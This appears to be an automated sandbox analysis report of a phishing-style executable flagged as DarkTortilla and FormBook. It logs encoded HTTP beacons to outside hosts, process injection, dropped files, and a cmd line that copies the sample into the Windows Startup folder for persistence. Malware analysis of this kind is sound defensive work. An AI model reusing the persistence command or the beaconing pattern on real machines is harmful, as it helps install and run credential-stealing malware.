                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              17192.168.11.2049769217.70.184.5080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 19:02:26.977296114 CET397OUTGET /l1qb/?VX=j+zwo0WruX31giYaAXLqFZsOSDWIhP7jTa/dbVxGHcBqV/4l3NxJtgpmZpbROnG1sUhGxH62sOLj7xpOC5An+cKklQHM9vXGdSm+p7Uk9aee91hqvbKIz6k=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.akravchenko.dev
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Nov 28, 2024 19:02:27.284579992 CET1289INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 18:02:27 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Content-Security-Policy: default-src 'self'; script-src 'nonce-8019fcae1268453bb55741248aae23f9';
                                                                                                                                              Vary: Accept-Language
                                                                                                                                              Data Raw: 39 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 38 30 31 39 66 63 61 65 31 32 36 38 34 35 33 62 62 35 35 37 34 31 32 34 38 61 61 65 32 33 66 39 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                              Data Ascii: 92e<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-8019fcae1268453bb55741248aae23f9';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>akravchenko.dev</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic
                                                                                                                                              Nov 28, 2024 19:02:27.284636021 CET1289INData Raw: 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 3c 2f 68 31 3e 3c 64 69 76 20 63 6c
                                                                                                                                              Data Ascii: _2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=akravchenko.dev"><strong>View the WHOIS results of
                                                                                                                                              Nov 28, 2024 19:02:27.284667969 CET67INData Raw: 6b 6f 2e 64 65 76 27 29 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 7d 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 6d 61 69 6e 3e 3c 2f 64 69 76 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                              Data Ascii: ko.dev'); }); });</script></main></div> </body></html>
                                                                                                                                              Nov 28, 2024 19:02:27.284699917 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              18192.168.11.204977043.153.84.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 19:02:32.475155115 CET660OUTPOST /jywy/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.hubeisuizhou.net
                                                                                                                                              Origin: http://www.hubeisuizhou.net
                                                                                                                                              Referer: http://www.hubeisuizhou.net/jywy/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 199
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 54 51 71 2b 56 6d 49 64 45 63 65 66 51 42 67 71 67 71 51 4d 6e 7a 4f 30 32 36 49 33 33 6b 54 74 57 6f 49 59 56 75 66 36 74 72 2f 73 32 69 6d 62 61 5a 49 33 4a 2b 59 70 39 55 57 44 45 77 4e 78 55 4a 55 42 75 54 52 50 66 66 51 2f 42 6b 6f 5a 34 45 31 4a 35 67 75 73 66 69 68 69 37 4a 44 37 32 44 55 46 65 77 76 43 2f 48 32 48 2f 63 6e 4d 56 35 33 79 71 52 73 77 66 35 66 4b 52 57 59 47 48 62 54 79 77 6a 42 76 6e 2b 64 70 67 7a 57 37 76 6d 4a 2b 78 47 2b 55 6b 6d 6b 44 42 54 74 6b 41 5a 62 50 53 6c 4a 47 31 35 56 67 4d 47 36 30 65 67 36 4a 71 71 2b 35 52 75 52 2f 2b 61 4d 31 61 77 3d 3d
                                                                                                                                              Data Ascii: VX=TQq+VmIdEcefQBgqgqQMnzO026I33kTtWoIYVuf6tr/s2imbaZI3J+Yp9UWDEwNxUJUBuTRPffQ/BkoZ4E1J5gusfihi7JD72DUFewvC/H2H/cnMV53yqRswf5fKRWYGHbTywjBvn+dpgzW7vmJ+xG+UkmkDBTtkAZbPSlJG15VgMG60eg6Jqq+5RuR/+aM1aw==
                                                                                                                                              Nov 28, 2024 19:02:32.648438931 CET289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 18:02:32 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 146
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              19192.168.11.204977143.153.84.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 19:02:35.178930044 CET680OUTPOST /jywy/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.hubeisuizhou.net
                                                                                                                                              Origin: http://www.hubeisuizhou.net
                                                                                                                                              Referer: http://www.hubeisuizhou.net/jywy/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 219
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 54 51 71 2b 56 6d 49 64 45 63 65 66 42 51 51 71 6a 4e 6b 4d 68 54 4f 37 6f 4b 49 33 73 55 54 70 57 6f 45 59 56 75 33 51 74 35 72 73 32 41 2b 62 5a 63 6f 33 4f 2b 59 70 36 6b 57 4d 41 77 4d 63 55 4a 5a 79 75 53 74 50 66 66 45 2f 42 67 73 5a 34 33 74 4f 6f 67 75 69 53 43 68 6b 2f 4a 44 37 32 44 55 46 65 77 36 58 2f 48 75 48 38 73 33 4d 48 59 33 78 32 42 73 33 50 70 66 4b 56 57 59 43 48 62 54 71 77 69 4d 4b 6e 34 5a 70 67 79 6d 37 75 33 4a 2f 37 47 2b 53 67 6d 6c 6d 42 48 30 56 4f 5a 54 79 56 6b 31 4b 30 70 74 73 41 77 72 75 44 53 4f 74 70 35 69 4c 56 65 6f 58 38 59 4e 75 48 78 4a 56 47 6a 52 7a 4a 45 75 62 65 72 67 63 63 5a 69 7a 61 36 45 3d
                                                                                                                                              Data Ascii: VX=TQq+VmIdEcefBQQqjNkMhTO7oKI3sUTpWoEYVu3Qt5rs2A+bZco3O+Yp6kWMAwMcUJZyuStPffE/BgsZ43tOoguiSChk/JD72DUFew6X/HuH8s3MHY3x2Bs3PpfKVWYCHbTqwiMKn4Zpgym7u3J/7G+SgmlmBH0VOZTyVk1K0ptsAwruDSOtp5iLVeoX8YNuHxJVGjRzJEubergccZiza6E=
                                                                                                                                              Nov 28, 2024 19:02:35.352215052 CET289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 18:02:35 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 146
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:12:53:31
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\Desktop\PO# 81136575.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\PO# 81136575.exe"
                                                                                                                                              Imagebase:0x210000
                                                                                                                                              File size:1'565'184 bytes
                                                                                                                                              MD5 hash:B353674E16431A7424571790D4D58F71
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1251917102.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1253880543.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1253880543.000000000467B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1251917102.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1253880543.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1253880543.00000000047DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:12:54:07
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                                                                                                                                              Imagebase:0x4f0000
                                                                                                                                              File size:236'544 bytes
                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:5
                                                                                                                                              Start time:12:54:07
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7d0360000
                                                                                                                                              File size:875'008 bytes
                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:6
                                                                                                                                              Start time:12:54:07
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 127.0.0.1 -n 49
                                                                                                                                              Imagebase:0xbc0000
                                                                                                                                              File size:18'944 bytes
                                                                                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:12:54:52
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 127.0.0.1 -n 49
                                                                                                                                              Imagebase:0xbc0000
                                                                                                                                              File size:18'944 bytes
                                                                                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:12:55:05
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                                                                                                                                              Imagebase:0x720000
                                                                                                                                              File size:1'565'184 bytes
                                                                                                                                              MD5 hash:B353674E16431A7424571790D4D58F71
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.5995803549.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.5995803549.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.5966810448.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              • Detection: 74%, ReversingLabs
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:12:55:37
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                                                                                                                                              Imagebase:0x720000
                                                                                                                                              File size:1'565'184 bytes
                                                                                                                                              MD5 hash:B353674E16431A7424571790D4D58F71
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:12:55:41
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                              Imagebase:0xa80000
                                                                                                                                              File size:43'008 bytes
                                                                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:20
                                                                                                                                              Start time:12:56:13
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:43'008 bytes
                                                                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:12:56:16
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\sages.exe"
                                                                                                                                              Imagebase:0xed0000
                                                                                                                                              File size:78'336 bytes
                                                                                                                                              MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                              • Detection: 83%, ReversingLabs
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:22
                                                                                                                                              Start time:12:56:16
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\sages.exe"
                                                                                                                                              Imagebase:0x350000
                                                                                                                                              File size:78'336 bytes
                                                                                                                                              MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:23
                                                                                                                                              Start time:12:56:28
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                              Imagebase:0x140000000
                                                                                                                                              File size:16'696'840 bytes
                                                                                                                                              MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:24
                                                                                                                                              Start time:12:56:29
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\clip.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\clip.exe"
                                                                                                                                              Imagebase:0x500000
                                                                                                                                              File size:24'576 bytes
                                                                                                                                              MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:25
                                                                                                                                              Start time:12:56:45
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:43'008 bytes
                                                                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:26
                                                                                                                                              Start time:12:56:48
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              Wow64 process (32bit):
